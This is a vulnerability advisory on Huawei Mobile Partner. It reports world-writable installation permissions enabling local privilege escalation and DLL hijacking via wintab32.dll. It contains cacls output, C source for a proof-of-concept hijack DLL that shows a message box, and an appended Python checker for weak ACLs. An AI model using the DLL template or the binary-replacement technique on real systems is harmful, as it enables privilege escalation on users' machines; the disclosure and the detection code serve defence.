Huawei Mobile Partner DLL Hijacking

Risk: Medium
Local: Yes
Remote: No

# Title: Huawei Mobile Partner Multiple Vulnerabilities
# Version:
# Tested on: Windows XP SP2 en
# Vendor:
# Software-Link:
# E-Mail: osanda[at]
# Author: Osanda Malith Jayathissa
# /!\ Author is not responsible for any damage you cause
# Use this material for educational purposes only

#1| Local Privilege Escalation
--------------------------------

- Description
==============
Any user on the system can modify the legitimate binary, replacing it with any kind of malicious executable.
The user could also place a malicious wintab32.dll file inside the "Mobile Partner" folder and perform DLL hijacking easily.
If an attacker breaks into a low-privilege account, he could use this application to escalate his privileges.

- Proof of Concept
===================
C:\Program Files>cacls "Mobile Partner"
C:\Program Files\Mobile Partner BUILTIN\Users:(OI)(IO)F
                                BUILTIN\Users:(CI)F
                                NT SERVICE\TrustedInstaller:(ID)F
                                NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
                                NT AUTHORITY\SYSTEM:(ID)F
                                NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F
                                BUILTIN\Administrators:(ID)F
                                BUILTIN\Administrators:(OI)(CI)(IO)(ID)F
                                CREATOR OWNER:(OI)(CI)(IO)(ID)F

C:\Program Files>cd "Mobile Partner"

C:\Program Files\Mobile Partner>cacls "Mobile Partner.exe"
C:\Program Files\Mobile Partner\Mobile Partner.exe BUILTIN\Users:F
                                                   BUILTIN\Users:(ID)F
                                                   NT AUTHORITY\SYSTEM:(ID)F
                                                   BUILTIN\Administrators:(ID)F

#2| Dll Hijacking Vulnerability (wintab32.dll)
-----------------------------------------------

#include <windows.h>

/* Declared before DllMain so the call below compiles cleanly. */
int owned(void);

BOOL WINAPI DllMain (
            HANDLE    hinstDLL,
            DWORD     fdwReason,
            LPVOID    lpvReserved)
{
    switch (fdwReason)
    {
    case DLL_PROCESS_ATTACH:
        /* Runs when the host process loads the DLL. */
        owned();
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

/* Harmless marker: shows a message box to prove the DLL was loaded. */
int owned(void) {
    MessageBox(0, "Mobile Partner DLL Hijacked\nOsanda Malith", "POC", MB_OK | MB_ICONWARNING);
    return 0;
}
/*EOF*/
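An added example, not part of the original advisory: a Python check that parses `cacls` output like the listings in the proof of concept and flags ACEs giving low-privileged groups write, change or full control, which is the condition that makes both issues possible. The function names and the LOW_PRIV list are assumptions of this example; the sample input is the advisory's own output, laid out one ACE per line.

```python
import re
# Principals that every interactive local user belongs to (assumed list).
LOW_PRIV = {"BUILTIN\\Users", "Everyone", "NT AUTHORITY\\INTERACTIVE",
            "NT AUTHORITY\\Authenticated Users"}
WRITE_RIGHTS = {"W", "C", "F"}  # cacls letters: Write, Change, Full control
ACE_RE = re.compile(r"^(?P<who>[^:]+):(?P<flags>(?:\([A-Z]+\))*)(?P<right>[NRWCF])$")

def parse_cacls(path, output):
    """Return (principal, flags, right) tuples from `cacls <path>` output."""
    aces = []
    for line in output.splitlines():
        line = line.strip()
        if line.startswith(path):  # first line is "<path> <first ACE>"
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if m:  # blank and multi-line "special access" entries are skipped
            aces.append((m["who"], re.findall(r"\((\w+)\)", m["flags"]), m["right"]))
    return aces

def weak_aces(path, output):
    """ACEs that let a low-privileged principal modify the object or its children."""
    findings = []
    for who, flags, right in parse_cacls(path, output):
        if who in LOW_PRIV and right in WRITE_RIGHTS:
            # (IO) = inherit-only: applies to children, not to the object itself.
            scope = "children only" if "IO" in flags else "object itself"
            findings.append((who, right, scope))
    return findings

# Sample input: the advisory's cacls output, laid out one ACE per line.
DIR_PATH = r"C:\Program Files\Mobile Partner"
DIR_ACL = r"""C:\Program Files\Mobile Partner BUILTIN\Users:(OI)(IO)F
    BUILTIN\Users:(CI)F
    NT SERVICE\TrustedInstaller:(ID)F
    NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
    NT AUTHORITY\SYSTEM:(ID)F
    NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F
    BUILTIN\Administrators:(ID)F
    BUILTIN\Administrators:(OI)(CI)(IO)(ID)F
    CREATOR OWNER:(OI)(CI)(IO)(ID)F"""
EXE_PATH = DIR_PATH + r"\Mobile Partner.exe"
EXE_ACL = r"""C:\Program Files\Mobile Partner\Mobile Partner.exe BUILTIN\Users:F
    BUILTIN\Users:(ID)F
    NT AUTHORITY\SYSTEM:(ID)F
    BUILTIN\Administrators:(ID)F"""

if __name__ == "__main__":
    for p, acl in ((DIR_PATH, DIR_ACL), (EXE_PATH, EXE_ACL)):
        print(p, weak_aces(p, acl))
```

A correctly locked-down install directory under Program Files yields an empty list for both the folder and the executable.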

